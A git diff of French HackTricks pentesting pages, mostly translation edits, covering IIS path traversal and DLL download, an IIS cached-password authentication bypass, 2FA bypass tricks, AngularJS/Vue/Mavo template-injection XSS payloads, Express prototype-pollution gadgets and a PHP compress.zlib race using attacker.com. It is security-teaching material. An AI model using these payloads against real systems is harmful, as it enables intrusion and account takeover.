* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**

View file

@ -8,15 +8,15 @@ Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -28,7 +28,7 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
---
Testez les extensions de fichiers exécutables :
Tester les extensions de fichiers exécutables :
* asp
* aspx
@ -57,7 +57,7 @@ X-FEServer: NHEXCHANGE2016
Vous pouvez télécharger des fichiers .config et les utiliser pour exécuter du code. Une façon de le faire est d'ajouter le code à la fin du fichier à l'intérieur d'un commentaire HTML: [Téléchargez l'exemple ici](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
Plus d'informations et techniques pour exploiter cette vulnérabilité [ici](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
Plus d'informations et de techniques pour exploiter cette vulnérabilité [ici](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
## Bruteforce de découverte IIS
@ -83,8 +83,8 @@ Utilisez-le sans ajouter d'extension, les fichiers qui en ont besoin l'ont déj
Consultez l'analyse complète sur: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
{% hint style="info" %}
En résumé, il y a plusieurs fichiers web.config à l'intérieur des dossiers de l'application avec des références aux fichiers "**assemblyIdentity**" et aux "**namespaces**". Avec ces informations, il est possible de savoir **où se trouvent les exécutables** et de les télécharger.\
À partir des **Dlls téléchargés**, il est également possible de trouver de **nouveaux namespaces** où vous devriez essayer d'accéder et obtenir le fichier web.config afin de trouver de nouveaux namespaces et assemblyIdentity.\
En résumé, il y a plusieurs fichiers web.config à l'intérieur des dossiers de l'application avec des références aux fichiers "**assemblyIdentity**" et aux "**espaces de noms**". Avec ces informations, il est possible de savoir **où se trouvent les exécutables** et de les télécharger.\
À partir des **Dlls téléchargés**, il est également possible de trouver de **nouveaux espaces de noms** auxquels vous devriez essayer d'accéder et obtenir le fichier web.config pour trouver de nouveaux espaces de noms et assemblyIdentity.\
De plus, les fichiers **connectionstrings.config** et **global.asax** peuvent contenir des informations intéressantes.\\
{% endhint %}
@ -99,11 +99,11 @@ Host: example-mvc-application.minded
```
Ce demande révèle divers paramètres et dépendances, tels que:
* Version **EntityFramework**
* Version d'**EntityFramework**
* **AppSettings** pour les pages web, la validation client et JavaScript
* Configurations **System.web** pour l'authentification et l'exécution
* Paramètres des modules **System.webServer**
* Liaisons d'assembly **Runtime** pour de nombreuses bibliothèques comme **Microsoft.Owin**, **Newtonsoft.Json**, et **System.Web.Mvc**
* Configurations de **System.web** pour l'authentification et l'exécution
* Paramètres des modules de **System.webServer**
* Liaisons d'assembly de **Runtime** pour de nombreuses bibliothèques comme **Microsoft.Owin**, **Newtonsoft.Json**, et **System.Web.Mvc**
Ces paramètres indiquent que certains fichiers, tels que **/bin/WebGrease.dll**, sont situés dans le dossier /bin de l'application.
@ -120,14 +120,14 @@ Host: example-mvc-application.minded
```
### **Téléchargement de DLLs**
La mention d'un espace de noms personnalisé suggère l'existence d'une DLL nommée "**WebApplication1**" présente dans le répertoire /bin. Ensuite, une requête pour télécharger le **WebApplication1.dll** est affichée:
La mention d'un espace de noms personnalisé suggère l'existence d'une DLL nommée "**WebApplication1**" présente dans le répertoire /bin. En suivant cela, une requête pour télécharger le **WebApplication1.dll** est affichée:
```markup
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded
```
Cela suggère la présence d'autres DLL essentielles, comme **System.Web.Mvc.dll** et **System.Web.Optimization.dll**, dans le répertoire /bin.
Dans un scénario où une DLL importe un espace de noms appelé **WebApplication1.Areas.Minded**, un attaquant pourrait déduire l'existence d'autres fichiers web.config dans des chemins prévisibles, tels que **/nom-de-la-zone/Views/**, contenant des configurations spécifiques et des références à d'autres DLL dans le dossier /bin. Par exemple, une requête vers **/Minded/Views/web.config** peut révéler des configurations et des espaces de noms indiquant la présence d'une autre DLL, **WebApplication1.AdditionalFeatures.dll**.
Dans un scénario où une DLL importe un espace de noms appelé **WebApplication1.Areas.Minded**, un attaquant pourrait déduire l'existence d'autres fichiers web.config dans des chemins prévisibles, tels que **/nom-de-la-zone/Views/**, contenant des configurations spécifiques et des références à d'autres DLL dans le dossier /bin. Par exemple, une requête vers **/Minded/Views/web.config** peut révéler des configurations et des espaces de noms qui indiquent la présence d'une autre DLL, **WebApplication1.AdditionalFeatures.dll**.
### Fichiers courants
@ -259,12 +259,12 @@ ASPXAUTH utilise les informations suivantes :
* **`decryptionIV`** (chaîne) : vecteur d'initialisation encodé en hexadécimal (par défaut un vecteur de zéros).
* **`decryptionKey`** (chaîne) : clé encodée en hexadécimal à utiliser pour le déchiffrement.
Cependant, certaines personnes utiliseront les **valeurs par défaut** de ces paramètres et utiliseront comme **cookie l'e-mail de l'utilisateur**. Par conséquent, si vous trouvez un site web utilisant la **même plateforme** qui utilise le cookie ASPXAUTH et que vous **créez un utilisateur avec l'e-mail de l'utilisateur que vous souhaitez usurper** sur le serveur attaqué, vous pourriez être en mesure d'utiliser **le cookie du deuxième serveur dans le premier** et d'usurper l'utilisateur.\
Cependant, certaines personnes utiliseront les **valeurs par défaut** de ces paramètres et utiliseront comme **cookie l'e-mail de l'utilisateur**. Par conséquent, si vous trouvez un site web utilisant la **même plateforme** qui utilise le cookie ASPXAUTH et que vous **créez un utilisateur avec l'e-mail de l'utilisateur que vous souhaitez usurper** sur le serveur attaqué, vous pourrez peut-être utiliser **le cookie du deuxième serveur dans le premier** et usurper l'utilisateur.\
Cette attaque a fonctionné dans ce [**writeup**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).
## Contournement de l'authentification IIS avec des mots de passe mis en cache (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
[Rapport complet ici](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html) : Un bogue dans le code **ne vérifiait pas correctement le mot de passe fourni par l'utilisateur**, donc un attaquant dont le **hachage de mot de passe correspond à une clé** déjà dans le **cache** pourra se connecter en tant qu'utilisateur.
[Rapport complet ici](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html) : Un bogue dans le code **n'a pas correctement vérifié le mot de passe fourni par l'utilisateur**, donc un attaquant dont le **hachage de mot de passe correspond à une clé** déjà dans le **cache** pourra se connecter en tant qu'utilisateur.
```python
# script for sanity check
> type test.py
@ -284,9 +284,9 @@ HTTP/1.1 401 Unauthorized
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
```
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**.
@ -305,7 +305,7 @@ Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -14,13 +14,13 @@ Autres façons de soutenir HackTricks :
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants voleurs d'informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
@ -66,7 +66,7 @@ La compromission du compte d'un utilisateur sur une plateforme **OAuth** de conf
#### **Absence de limite de taux**
L'absence de limite sur le nombre de tentatives de code permet des attaques par force brute, bien que des limites de taux silencieuses potentielles doivent être prises en compte.
L'absence de limite sur le nombre de tentatives de code permet des attaques par force brute, bien que la présence potentielle de limites de taux silencieuses soit à considérer.
#### **Force brute lente**
@ -116,13 +116,13 @@ L'usurpation de l'adresse IP de la victime via l'en-tête **X-Forwarded-For** pe
Tester les sous-domaines peut utiliser des versions obsolètes sans prise en charge de la 2FA ou contenir des implémentations de 2FA vulnérables.
#### **Endpoints API**
#### **Points de terminaison API**
Les anciennes versions d'API, indiquées par des chemins de répertoire /v\*, peuvent être vulnérables aux méthodes de contournement de la 2FA.
### **Gestion des sessions précédentes**
La terminaison des sessions existantes lors de l'activation de la 2FA sécurise les comptes contre les accès non autorisés à partir de sessions compromises.
La terminaison des sessions existantes lors de l'activation de la 2FA sécurise les comptes contre l'accès non autorisé à partir de sessions compromises.
### **Défauts de contrôle d'accès avec codes de secours**
@ -144,3 +144,16 @@ L'utilisation de requêtes leurres pour obscurcir les tentatives de force brute
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants voleurs d'informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
{% embed url="https://whiteintel.io" %}

View file

@ -12,9 +12,9 @@ Autres façons de soutenir HackTricks :
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -34,7 +34,7 @@ Le **test** de cette vulnérabilité est très **similaire** à celui du **SSTI*
# AngularJS
AngularJS est un framework JavaScript largement utilisé qui interagit avec HTML à travers des attributs connus sous le nom de directives, l'un des plus notables étant **`ng-app`**. Cette directive permet à AngularJS de traiter le contenu HTML, permettant l'exécution d'expressions JavaScript à l'intérieur de doubles accolades.
AngularJS est un framework JavaScript largement utilisé qui interagit avec HTML à travers des attributs connus sous le nom de directives, l'une des plus notables étant **`ng-app`**. Cette directive permet à AngularJS de traiter le contenu HTML, permettant l'exécution d'expressions JavaScript à l'intérieur de doubles accolades.
Dans les scénarios où une entrée utilisateur est insérée dynamiquement dans le corps HTML balisé avec `ng-app`, il est possible d'exécuter du code JavaScript arbitraire. Cela peut être réalisé en exploitant la syntaxe d'AngularJS dans l'entrée. Voici des exemples démontrant comment du code JavaScript peut être exécuté:
```javascript
@ -53,21 +53,21 @@ Vous pouvez trouver un exemple en ligne très **basique** de la vulnérabilité
# VueJS
Vous pouvez trouver une implémentation **Vue** **vulnérable** sur [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
Vous pouvez trouver une implémentation **Vue** vulnérable sur [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
Charge utile fonctionnelle: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
Et le **code source** de l'exemple vulnérable est ici: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
Et le **code source** de l'exemple vulnérable est disponible ici: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
```markup
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
```
Un très bon article sur CSTI en VUE peut être trouvé sur [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
Un très bon article sur CSTI dans VUE peut être trouvé sur [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
## **V3**
```
{{_openBlock.constructor('alert(1)')()}}
```
Crédit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
Crédit : [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
## **V2**
```
@ -79,7 +79,7 @@ Crédit: [Mario Heiderich](https://twitter.com/cure53berlin)
# Mavo
Charge utile:
Charge utile :
```
[7*7]
[(1,alert)(1)]
@ -99,9 +99,9 @@ javascript:alert(1)%252f%252f..%252fcss-images
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -119,7 +119,7 @@ Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

View file

@ -10,13 +10,13 @@ Autres façons de soutenir HackTricks :
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
- Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
- **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
- **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
- **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -46,7 +46,7 @@ Dans ces cas, XSS n'est généralement pas possible avec un type de contenu JSON
```json
{"__proto__":{"_body":true,"body":"<script>evil()"}}
```
En **polluant** les propriétés **`body`** et **`_body`**, il est possible de faire en sorte qu'**Express serve le type de contenu HTML** et reflète la propriété `_body`, ce qui entraîne une XSS stockée.
En **polluant** les propriétés **`body`** et **`_body`**, il est possible de provoquer **Express pour servir le type de contenu HTML** et refléter la propriété `_body`, ce qui entraîne un XSS stocké.
### Rendu UTF7
@ -54,11 +54,11 @@ Il est possible de faire en sorte qu'express **rende le contenu UTF-7 avec**:
```json
{"__proto__":{"content-type": "application/json; charset=utf-7"}}
```
## Techniques de numérisation sécuritaires
## Techniques de numérisation sécuries
### Espaces JSON
Le PP suivant ajoutera un espace supplémentaire aux attributs à l'intérieur d'un JSON sans compromettre la fonctionnalité :
Le PP suivant fera en sorte que les attributs à l'intérieur d'un JSON aient un espace supplémentaire qui ne cassera pas la fonctionnalité :
```json
{"__proto__":{"json spaces": " "}}
```
@ -66,7 +66,7 @@ Ensuite, un JSON réfléchi ressemblera à :
```json
{"foo": "bar"} -- Note the extra space
```
### En-têtes Exposés
### En-têtes exposés
Le gadget PP suivant fera en sorte que le serveur renvoie l'en-tête HTTP : **`Access-Control-Expose_headers: foo`**
```json
@ -93,7 +93,7 @@ Il est possible de changer le **code de statut retourné** en utilisant la charg
```
### Erreur
Lorsque vous attribuez à un prototype une valeur primitive telle qu'une chaîne de caractères, cela produit une **opération no-op car le prototype doit être un objet**. Si vous essayez d'attribuer un objet prototype à `Object.prototype` lui-même, cela va **lever une exception**. Nous pouvons utiliser ces deux comportements pour **détecter si la pollution du prototype a réussi** :
Lorsque vous attribuez un prototype avec un type primitif tel qu'une chaîne de caractères, cela produit une **opération no-op car le prototype doit être un objet**. Si vous essayez d'attribuer un objet prototype à `Object.prototype` lui-même, cela va **lever une exception**. Nous pouvons utiliser ces deux comportements pour **détecter si la pollution du prototype a réussi** :
```javascript
({}).__proto__.__proto__={}//throws type exception
({}).__proto__.__proto__="x"//no-op does not throw exception
@ -125,9 +125,9 @@ Vous pourriez certainement l'utiliser dans une **chaîne** de bugs pour exploite
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -145,7 +145,7 @@ Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

View file

@ -1,24 +1,24 @@
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants voleurs d'informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
@ -34,7 +34,7 @@ Cela signifie qu'un appel tel que:
```php
file_get_contents("compress.zlib://http://attacker.com/file")
```
Le serveur pourrait répondre à la requête avec une réponse HTTP valide, maintenir la connexion ouverte, et envoyer des données supplémentaires plus tard qui seront également écrites dans le fichier.
Le serveur pourrait répondre à la requête avec une réponse HTTP valide, maintenir la connexion ouverte, et envoyer des données supplémentaires ultérieurement qui seront également écrites dans le fichier.
Vous pouvez voir ces informations dans cette partie du code php-src dans main/streams/cast.c:
```c
@ -50,7 +50,7 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
[**Ce CTF**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) a été résolu en utilisant le tour précédent.
L'attaquant fera en sorte que le **serveur victime ouvre une connexion pour lire un fichier depuis le serveur de l'attaquant** en utilisant le protocole **`compress.zlib`**.
L'attaquant fera en sorte que le **serveur victime ouvre une connexion en lisant un fichier depuis le serveur de l'attaquant** en utilisant le protocole **`compress.zlib`**.
**Pendant que** cette **connexion** existe, l'attaquant **exfiltrera le chemin** vers le fichier temporaire créé (il est divulgué par le serveur).
@ -60,13 +60,13 @@ Cependant, il y a une vérification dans le serveur web qui **empêche le charge
Pour plus d'informations, consultez la description de la Condition de Course et du CTF sur [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**.
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de malwares volant des informations.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Vous pouvez consulter leur site web et essayer leur moteur **gratuitement** sur :
@ -76,12 +76,12 @@ Vous pouvez consulter leur site web et essayer leur moteur **gratuitement** sur
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Autres moyens de soutenir HackTricks :
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez** 💬 le groupe Discord](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -2,21 +2,21 @@
<details>
